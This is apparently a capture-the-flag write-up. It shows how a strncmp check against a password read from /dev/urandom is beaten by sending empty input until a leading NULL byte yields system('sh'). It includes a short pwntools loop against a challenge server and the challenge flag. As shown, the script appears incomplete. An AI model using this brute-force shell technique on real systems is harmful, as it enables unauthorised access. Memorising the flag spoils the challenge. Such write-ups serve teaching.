Tags: string-format

Rating: 0

This seems to be a very simple challenge. I'm not sure why this was classified as medium.

The authenticate function looked like:


get_inp(&s1, 1024);
if ( !strncmp(&s1, password, n) )
system("sh");


The password was being read from /dev/urandom. There is a 1/256 chance that the first character is NULL. Simply sending empty strings as password gets you a shell.


from pwn import *
context.log_level = 'error'
for i in range(1000):
conn = remote("18.224.57.15", 1337)
conn.recvuntil(">>> ")
conn.sendline("1")

Flag: inctf{sp1r1t3d_n0te_t0_uns3cur3_the_p4d}